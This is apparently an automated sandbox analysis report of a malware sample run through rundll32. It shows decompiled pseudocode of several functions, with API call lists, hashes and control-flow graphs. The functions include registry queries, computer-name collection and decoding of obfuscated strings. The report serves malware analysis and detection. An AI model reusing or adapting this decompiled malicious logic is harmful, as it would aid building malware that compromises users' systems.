						_t81 = E043574B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
						E0435147E(_t93);
					}
					if(_t81 != 0) {
						L17:
						E0435147E(_v92);
						L19:
						_t92 = _v96;
						if(_v96 != 0) {
							E0435568A(_t92);
						}
						goto L22;
					} else {
						if(( *0x435d260 & 0x00000001) == 0) {
							L14:
							E04356E92(_t81, _v60, _v56,  *0x435d270, 0);
							_t81 = E04356737(_v72,  &_v64,  &_v60, 0);
							if(_t81 == 0) {
								_v68 = _v96;
								_v64 =  &_v60;
								_t81 = E043572F2( &_v84, 0);
							}
							E0435147E(_v60);
							goto L17;
						}
						_t67 =  *0x435d2a4; // 0x251a5a8
						_t18 = _t67 + 0x435e823; // 0x65696c43
						_t70 = E0435A5E9(0, _t18);
						_t95 = _t70;
						if(_t70 == 0) {
							_t81 = 8;
						} else {
							_t22 =  &_v96; // 0x65696c43
							_t81 = E043574B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
							E0435147E(_t95);
						}
						if(_t81 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}




























                                          0x04356ce9
                                          0x04356ced
                                          0x04356cf4
                                          0x04356cfc
                                          0x04356cfd
                                          0x04356cfe
                                          0x04356cff
                                          0x04356d00
                                          0x04356d01
                                          0x04356d09
                                          0x04356d15
                                          0x04356d17
                                          0x04356d1d
                                          0x04356e86
                                          0x04356e87
                                          0x04356e8f
                                          0x04356e8f
                                          0x04356d2f
                                          0x04356d37
                                          0x04356e78
                                          0x04356e79
                                          0x04356e7d
                                          0x00000000
                                          0x04356e7d
                                          0x04356d4a
                                          0x04356d4c
                                          0x04356d4c
                                          0x04356d58
                                          0x04356d5d
                                          0x04356d63
                                          0x04356e66
                                          0x00000000
                                          0x04356d69
                                          0x04356d69
                                          0x04356d6e
                                          0x04356d77
                                          0x04356d7c
                                          0x04356d85
                                          0x04356dac
                                          0x04356d87
                                          0x04356da1
                                          0x04356da3
                                          0x04356da3
                                          0x04356daf
                                          0x04356e59
                                          0x04356e5d
                                          0x04356e67
                                          0x04356e67
                                          0x04356e6d
                                          0x04356e6f
                                          0x04356e6f
                                          0x00000000
                                          0x04356db5
                                          0x04356dbc
                                          0x04356e01
                                          0x04356e14
                                          0x04356e2d
                                          0x04356e31
                                          0x04356e37
                                          0x04356e3f
                                          0x04356e4e
                                          0x04356e4e
                                          0x04356e54
                                          0x00000000
                                          0x04356e54
                                          0x04356dbe
                                          0x04356dc3
                                          0x04356dcc
                                          0x04356dd1
                                          0x04356dd5
                                          0x04356dfc
                                          0x04356dd7
                                          0x04356de7
                                          0x04356df1
                                          0x04356df3
                                          0x04356df3
                                          0x04356dff
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04356dff
                                          0x04356daf

                                          APIs
                                          • memset.NTDLL ref: 04356CED
                                            • Part of subcall function 04354814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,04356D15,00410025,00000005,?,00000000), ref: 04354825
                                            • Part of subcall function 04354814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 04354842
                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04356D24
                                          • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04354AB5), ref: 04356D2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                          • String ID: Clie
                                          • API String ID: 3817122888-1624203186
                                          • Opcode ID: c31a412ddcd7b2224e4baf415773df64e24a08bd9dfd8d74a1d2c57b6f8faa53
                                          • Instruction ID: 1e9900a7805dd0c9d752b427d9f4461d04c08b224653802c8fc31d7da82c7ac9
                                          • Opcode Fuzzy Hash: c31a412ddcd7b2224e4baf415773df64e24a08bd9dfd8d74a1d2c57b6f8faa53
                                          • Instruction Fuzzy Hash: A041C272605341AFEB10AFA0DC85D6FB7ECEF48704F40A929BD88D7120D670ED048B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04354FFA, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 366 4354ffa-435503c 368 43550c3-43550c9 366->368 369 4355042-435504b 366->369 370 435504d-435505e SysAllocString 369->370 371 435508c-435508f 369->371 374 4355060-4355067 370->374 375 4355069-4355081 370->375 372 4355091-43550a1 SysAllocString 371->372 373 43550ed 371->373 377 43550a3 372->377 378 43550cc-43550eb 372->378 379 43550ef-43550f2 373->379 376 43550b5-43550b8 374->376 382 4355085-435508a 375->382 376->368 383 43550ba-43550bd SysFreeString 376->383 381 43550aa-43550ac 377->381 378->379 380 43550f4-4355101 379->380 379->381 380->368 381->376 384 43550ae-43550af SysFreeString 381->384 382->371 382->376 383->368 384->376
                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 04355057
                                          • SysAllocString.OLEAUT32(0435A6F4), ref: 0435509B
                                          • SysFreeString.OLEAUT32(00000000), ref: 043550AF
                                          • SysFreeString.OLEAUT32(00000000), ref: 043550BD
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: a086fd3e96ba5ab3e7140c444b9b555fe185282249c870d935f8a03027cab48b
                                          • Instruction ID: 46db0a0be9de86f7b879f809c6a8883ca9bc842f3e49f0cfce4976bad2858160
                                          • Opcode Fuzzy Hash: a086fd3e96ba5ab3e7140c444b9b555fe185282249c870d935f8a03027cab48b
                                          • Instruction Fuzzy Hash: 7431EB72900209FFCB05DF98D494CAE7BB9FF48310B10946AE9069B250E775AA81CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04351295, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 386 4351295-43512a9 387 43512ae-43512b3 386->387 388 43512b9-43512bc 387->388 389 435134a-4351351 387->389 390 43512d6-43512d9 388->390 391 43512be-43512d3 Sleep 388->391 390->389 392 43512db-43512e0 390->392 391->390 394 43512e2-43512f4 392->394 395 435133d-4351348 392->395 397 4351334-4351339 394->397 398 43512f6-4351303 lstrlenW 394->398 395->389 397->395 398->397 399 4351305-4351313 call 43558be 398->399 402 4351315-4351322 memcpy 399->402 403 4351324 399->403 404 435132b-435132e SysFreeString 402->404 403->404 404->397
                                          C-Code - Quality: 78%
                                          			E04351295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E043558BE(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                          0x043512a1
                                          0x043512a5
                                          0x043512a6
                                          0x043512a7
                                          0x043512a9
                                          0x043512ab
                                          0x043512ae
                                          0x043512b3
                                          0x0435134a
                                          0x04351351
                                          0x04351351
                                          0x043512bc
                                          0x043512c3
                                          0x043512d3
                                          0x043512d3
                                          0x043512d9
                                          0x043512db
                                          0x043512e0
                                          0x043512e9
                                          0x043512ef
                                          0x043512f4
                                          0x043512ff
                                          0x04351303
                                          0x04351305
                                          0x04351306
                                          0x0435130f
                                          0x04351313
                                          0x04351324
                                          0x04351315
                                          0x0435131a
                                          0x0435131f
                                          0x0435132e
                                          0x0435132e
                                          0x04351303
                                          0x04351334
                                          0x0435133a
                                          0x0435133a
                                          0x04351343
                                          0x04351348
                                          0x04351348
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: 973428e5009ca8a7b361efd2b1203985eefa8ae555a4d0a4d57b7f44a3b5d02a
                                          • Instruction ID: 7e70a5d38e872fb70c011dded8428242b6558e9b971c7540a2f04e65e8329e92
                                          • Opcode Fuzzy Hash: 973428e5009ca8a7b361efd2b1203985eefa8ae555a4d0a4d57b7f44a3b5d02a
                                          • Instruction Fuzzy Hash: 39213C75D0120AEFDB11DFA4D898E9EBBB8FF48304B105169E945E7210EB70EA41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043568CF, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 405 43568cf-43568e9 call 4359138 408 43568ee-4356907 call 4351b13 405->408 409 43568eb 405->409 411 435690c-4356910 408->411 409->408 412 4356916-4356930 StrToIntExW 411->412 413 43569cf-43569d4 411->413 416 4356936-4356952 call 4355fcb 412->416 417 43569bf-43569c1 412->417 414 43569d6 call 435568a 413->414 415 43569db-43569e1 413->415 414->415 418 43569c2-43569cd HeapFree 416->418 422 4356954-435696d call 43575e7 416->422 417->418 418->413 425 435698f-43569bd call 4351bc1 HeapFree 422->425 426 435696f-4356976 422->426 425->418 426->425 428 4356978-435698a call 43575e7 426->428 428->425
                                          C-Code - Quality: 100%
                                          			E043568CF() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t51;

				_v12 = 0;
				_t23 = E04359138(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x435d2a4; // 0x251a5a8
				_t4 = _t24 + 0x435ede0; // 0x6879388
				_t5 = _t24 + 0x435ed88; // 0x4f0053
				_t26 = E04351B13( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x435d2a4; // 0x251a5a8
						_t11 = _t32 + 0x435edd4; // 0x687937c
						_t48 = _t11;
						_t12 = _t32 + 0x435ed88; // 0x4f0053
						_t51 = E04355FCB(_t11, _t12, _t11);
						_t58 = _t51;
						if(_t51 != 0) {
							_t35 =  *0x435d2a4; // 0x251a5a8
							_t13 = _t35 + 0x435ea59; // 0x30314549
							if(E043575E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
								_t60 =  *0x435d25c - 6;
								if( *0x435d25c <= 6) {
									_t42 =  *0x435d2a4; // 0x251a5a8
									_t15 = _t42 + 0x435ec3a; // 0x52384549
									E043575E7(_t48, _t60, _v8, _t51, _t15, 0x13);
								}
							}
							_t38 =  *0x435d2a4; // 0x251a5a8
							_t17 = _t38 + 0x435ee18; // 0x68793c0
							_t18 = _t38 + 0x435edf0; // 0x680043
							_t45 = E04351BC1(_v8, 0x80000001, _t51, _t18, _t17);
							HeapFree( *0x435d238, 0, _t51);
						}
					}
					HeapFree( *0x435d238, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E0435568A(_t53);
				}
				return _t45;
			}

















                                          0x043568df
                                          0x043568e2
                                          0x043568e9
                                          0x043568eb
                                          0x043568eb
                                          0x043568ee
                                          0x043568f3
                                          0x043568fa
                                          0x04356907
                                          0x0435690c
                                          0x04356910
                                          0x0435691e
                                          0x0435692c
                                          0x04356930
                                          0x043569c1
                                          0x043569c1
                                          0x04356936
                                          0x04356936
                                          0x0435693b
                                          0x0435693b
                                          0x04356942
                                          0x0435694e
                                          0x04356950
                                          0x04356952
                                          0x04356954
                                          0x0435695b
                                          0x0435696d
                                          0x0435696f
                                          0x04356976
                                          0x04356978
                                          0x0435697f
                                          0x0435698a
                                          0x0435698a
                                          0x04356976
                                          0x0435698f
                                          0x04356994
                                          0x0435699b
                                          0x043569b9
                                          0x043569bb
                                          0x043569bb
                                          0x04356952
                                          0x043569cd
                                          0x043569cd
                                          0x043569cf
                                          0x043569d4
                                          0x043569d6
                                          0x043569d6
                                          0x043569e1

                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,06879388,00000000,?,7519F710,00000000,7519F730), ref: 0435691E
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,068793C0,?,00000000,30314549,00000014,004F0053,0687937C), ref: 043569BB
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04359C10), ref: 043569CD
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 8d16adf3eaa76e0c23d554a4e851eb6124b8fdd84f5214a8a3c2a896d84bdf89
                                          • Instruction ID: 38351b2767321f8d0483e96e294795358095d3ea9cf5834df277f7bdf9f6c6ce
                                          • Opcode Fuzzy Hash: 8d16adf3eaa76e0c23d554a4e851eb6124b8fdd84f5214a8a3c2a896d84bdf89
                                          • Instruction Fuzzy Hash: CC319332A00259BFEB11EBA0DC85EAE7BBDEF08704F056065F908AB160D770EE14DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04359F11, Relevance: 4.6, APIs: 3, Instructions: 77memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04359F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t19;
				void* _t25;
				void* _t31;
				void* _t37;
				void* _t41;
				intOrPtr _t43;
				void* _t44;

				_t37 = __edx;
				_t33 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t43 =  *0x435d2a4; // 0x251a5a8
				_push(0x800);
				_push(0);
				_push( *0x435d238);
				_t1 = _t43 + 0x435e791; // 0x6976612e
				_t44 = _t1;
				if( *0x435d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t31 = 8;
						L7:
						if(_t31 != 0) {
							L10:
							 *0x435d24c =  *0x435d24c + 1;
							L11:
							return _t31;
						}
						_t46 = _a4;
						_t41 = _v8;
						 *_a16 = _a4;
						 *_a20 = E04357CF7(_a4, _t41); // executed
						_t19 = E043560CF(_t41, _t41, _t46); // executed
						if(_t19 != 0) {
							 *_a8 = _t41;
							 *_a12 = _t19;
							if( *0x435d24c < 5) {
								 *0x435d24c =  *0x435d24c & 0x00000000;
							}
							goto L11;
						}
						_t31 = 0xbf;
						E04356106();
						RtlFreeHeap( *0x435d238, 0, _t41); // executed
						goto L10;
					}
					_t25 = E0435514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
					L5:
					_t31 = _t25;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t25 = E04351754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
				goto L5;
			}












                                          0x04359f11
                                          0x04359f11
                                          0x04359f14
                                          0x04359f15
                                          0x04359f1f
                                          0x04359f26
                                          0x04359f2b
                                          0x04359f2d
                                          0x04359f33
                                          0x04359f33
                                          0x04359f39
                                          0x04359f61
                                          0x04359f79
                                          0x04359f7b
                                          0x04359f7c
                                          0x04359f7e
                                          0x04359fbc
                                          0x04359fbc
                                          0x04359fc2
                                          0x04359fc8
                                          0x04359fc8
                                          0x04359f80
                                          0x04359f86
                                          0x04359f89
                                          0x04359f98
                                          0x04359f9a
                                          0x04359fa1
                                          0x04359fd5
                                          0x04359fda
                                          0x04359fdc
                                          0x04359fde
                                          0x04359fde
                                          0x00000000
                                          0x04359fdc
                                          0x04359fa3
                                          0x04359fa8
                                          0x04359fb6
                                          0x00000000
                                          0x04359fb6
                                          0x04359f70
                                          0x04359f75
                                          0x04359f75
                                          0x00000000
                                          0x04359f75
                                          0x04359f43
                                          0x00000000
                                          0x00000000
                                          0x04359f52
                                          0x00000000

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04359F3B
                                            • Part of subcall function 04351754: GetTickCount.KERNEL32 ref: 04351768
                                            • Part of subcall function 04351754: wsprintfA.USER32 ref: 043517B8
                                            • Part of subcall function 04351754: wsprintfA.USER32 ref: 043517D5
                                            • Part of subcall function 04351754: wsprintfA.USER32 ref: 04351801
                                            • Part of subcall function 04351754: HeapFree.KERNEL32(00000000,?), ref: 04351813
                                            • Part of subcall function 04351754: wsprintfA.USER32 ref: 04351834
                                            • Part of subcall function 04351754: HeapFree.KERNEL32(00000000,?), ref: 04351844
                                            • Part of subcall function 04351754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04351872
                                            • Part of subcall function 04351754: GetTickCount.KERNEL32 ref: 04351883
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04359F59
                                          • RtlFreeHeap.NTDLL(00000000,?,?,?,04359C62,00000002,?,?,?,?), ref: 04359FB6
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                          • String ID:
                                          • API String ID: 1676223858-0
                                          • Opcode ID: 9e9a57448d69fe402c2a5d1a469c5226809962cd56cd8b9c71ba6beca1e70d3f
                                          • Instruction ID: f321c05bc4ae43f514839c3c611d72a72b12f84cc2729fbabb813a25c094a61f
                                          • Opcode Fuzzy Hash: 9e9a57448d69fe402c2a5d1a469c5226809962cd56cd8b9c71ba6beca1e70d3f
                                          • Instruction Fuzzy Hash: FE2119B5200305EBEB119F69E840FAA77ACEF48349F10A025FD0697260D774FD459BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0435642C, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E0435642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04354FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x435d2a4; // 0x251a5a8
						_t20 = _t68 + 0x435e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04355103(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                          0x04356432
                                          0x04356435
                                          0x04356445
                                          0x0435644e
                                          0x04356452
                                          0x04356520
                                          0x04356526
                                          0x04356526
                                          0x0435646c
                                          0x04356471
                                          0x04356475
                                          0x0435647b
                                          0x04356480
                                          0x04356487
                                          0x04356496
                                          0x04356496
                                          0x0435649a
                                          0x0435649c
                                          0x043564a8
                                          0x043564b3
                                          0x043564be
                                          0x043564c2
                                          0x043564cc
                                          0x043564d0
                                          0x043564d2
                                          0x043564d7
                                          0x043564de
                                          0x043564ee
                                          0x043564ee
                                          0x043564d7
                                          0x043564d0
                                          0x043564f0
                                          0x043564f5
                                          0x043564fa
                                          0x043564fa
                                          0x043564fd
                                          0x04356506
                                          0x0435650b
                                          0x0435650b
                                          0x04356510
                                          0x04356515
                                          0x04356515
                                          0x04356510
                                          0x0435649a
                                          0x04356517
                                          0x0435651d
                                          0x00000000

                                          APIs
                                            • Part of subcall function 04354FFA: SysAllocString.OLEAUT32(80000002), ref: 04355057
                                            • Part of subcall function 04354FFA: SysFreeString.OLEAUT32(00000000), ref: 043550BD
                                          • SysFreeString.OLEAUT32(?), ref: 0435650B
                                          • SysFreeString.OLEAUT32(0435A6F4), ref: 04356515
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: aeb43272750f494d4b3c506cd8d56d3dafa64b7606206985e6e671220310b841
                                          • Instruction ID: 043108584d32dda2d3d5d77112a009316f7560d0a3865c8e39a1f2f148c42aca
                                          • Opcode Fuzzy Hash: aeb43272750f494d4b3c506cd8d56d3dafa64b7606206985e6e671220310b841
                                          • Instruction Fuzzy Hash: 00314B72500159AFCB11DF68C889CAFBB79FFC97447644A58FC199B224E231ED51CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043573E9, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E043573E9(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E043558BE(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E0435147E(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                          0x043573ee
                                          0x043573f9
                                          0x043573fb
                                          0x04357401
                                          0x04357403
                                          0x04357408
                                          0x04357411
                                          0x04357415
                                          0x0435741e
                                          0x04357422
                                          0x04357431
                                          0x04357424
                                          0x04357425
                                          0x0435742a
                                          0x0435742a
                                          0x04357422
                                          0x04357415
                                          0x0435743a

                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,043551DC,7519F710,00000000,?,?,043551DC), ref: 04357401
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,043551DC,043551DD,?,?,043551DC), ref: 0435741E
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: ab45c27c6e9bd1599d9c0c1326d0b2427f4e0d7c8a553347e33d421f67f28cb0
                                          • Instruction ID: 6b497c55efeb5231a1bfc37a3598e73d4ce6676f65922cd1ff60ee037ed13f61
                                          • Opcode Fuzzy Hash: ab45c27c6e9bd1599d9c0c1326d0b2427f4e0d7c8a553347e33d421f67f28cb0
                                          • Instruction Fuzzy Hash: AEF0B466B00249BAEB10DABA8C00EAF7ABCDFC4650F711059AD04D3110EB74EF0186B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04357BA9, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 34%
                                          			E04357BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x435d2a4; // 0x251a5a8
				_t4 = _t15 + 0x435e39c; // 0x6878944
				_t20 = _t4;
				_t6 = _t15 + 0x435e124; // 0x650047
				_t17 = E0435642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
